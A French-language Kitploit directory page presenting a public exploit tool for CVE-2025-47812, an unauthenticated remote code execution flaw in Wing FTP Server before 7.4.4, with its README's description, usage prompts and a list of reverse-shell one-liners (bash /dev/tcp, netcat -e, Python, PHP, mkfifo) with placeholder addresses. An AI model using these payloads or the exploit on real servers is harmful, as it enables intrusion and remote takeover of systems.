Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-47812 — Exploit d'exécution de code à distance non authentifiée pour Wing FTP Server < 7.4.4, permettant l'exécution de commandes et des shells inversés via une injection Lua dans les fichiers de session. | Kitploit
Outils/GitHubGitHub/blindma1den/cve-2025-47812
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingOutil d'Accès à Distance
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Exploit d'exécution de code à distance non authentifiée pour Wing FTP Server < 7.4.4, permettant l'exécution de commandes et des shells inversés via une injection Lua dans les fichiers de session.

13il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-47812 - Exécution de code à distance (RCE) sur Wing FTP Server

===========================================================

Auteur : blindma1den

Date : juillet 2025

Type d'exploit : Exécution de code à distance (non authentifiée)

Cible : Wing FTP Server < 7.4.4

Score CVSS : 10,0 (Critique)


DESCRIPTION

Ce script exploite CVE-2025-47812, une vulnérabilité critique de l'interface web de Wing FTP Server qui permet à des attaquants distants d'exécuter des commandes système arbitraires ou d'ouvrir un reverse shell sans authentification.

La faille est causée par une gestion inappropriée des octets nuls (%00) dans le formulaire de connexion (/loginok.html). Cela permet l'injection de code Lua dans les fichiers de session, qui sont ensuite évalués lors de l'accès à des points d'entrée comme /dir.html.


SOURCES

Description NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-47812


FONCTIONNALITÉS

  • Exécution de commandes (ex. : whoami, )
uname -a
  • Plusieurs payloads de reverse shell
  • Extraction automatique du cookie de session UID
  • Implémentation Python 3 modulaire et propre

  • PRÉREQUIS

    • Python 3.7+
    • Module requests

    Installer les dépendances :

    root@kitploit:~
    pip install requests
    

    UTILISATION

    Exécutez le script :

    root@kitploit:~
    python3 wingftp_rce_exploit.py
    

    Les invites suivantes vous seront proposées :

    • URL cible (ex. : http://127.0.0.1:5466)
    • Nom d'utilisateur (défaut : anonymous)
    • Mode d'exploit : [1] Exécuter une commande [2] Lancer un reverse shell

    EXEMPLES

    [1] EXÉCUTER UNE COMMANDE :

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 1
    Command to execute (default: whoami): whoami
    

    [2] REVERSE SHELL :

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 2
    Reverse shell IP address: 192.168.1.100
    Reverse shell port: 4444
    

    Démarrez votre listener avant de déclencher le shell :

    root@kitploit:~
    nc -lvnp 4444
    

    PAYLOADS UTILISÉS (REVERSE SHELL)

    Bash : bash -i >& /dev/tcp/IP/PORT 0>&1

    Python3 : python3 -c 'import socket,subprocess,os; ...'

    Netcat : nc IP PORT -e /bin/sh

    PHP : php -r '$sock=fsockopen("IP",PORT); ...'

    FIFO + Netcat : rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


    AVERTISSEMENT

    Ce code est fourni à des fins éducatives uniquement. N'utilisez PAS cet exploit contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous ne disposez pas d'une autorisation explicite de test. Toute utilisation non autorisée est illégale et contraire à l'éthique.

    Corrigez vos systèmes immédiatement. Wing FTP Server 7.4.4 résout cette vulnérabilité.

    Bon hacking !

    Télécharger l’outil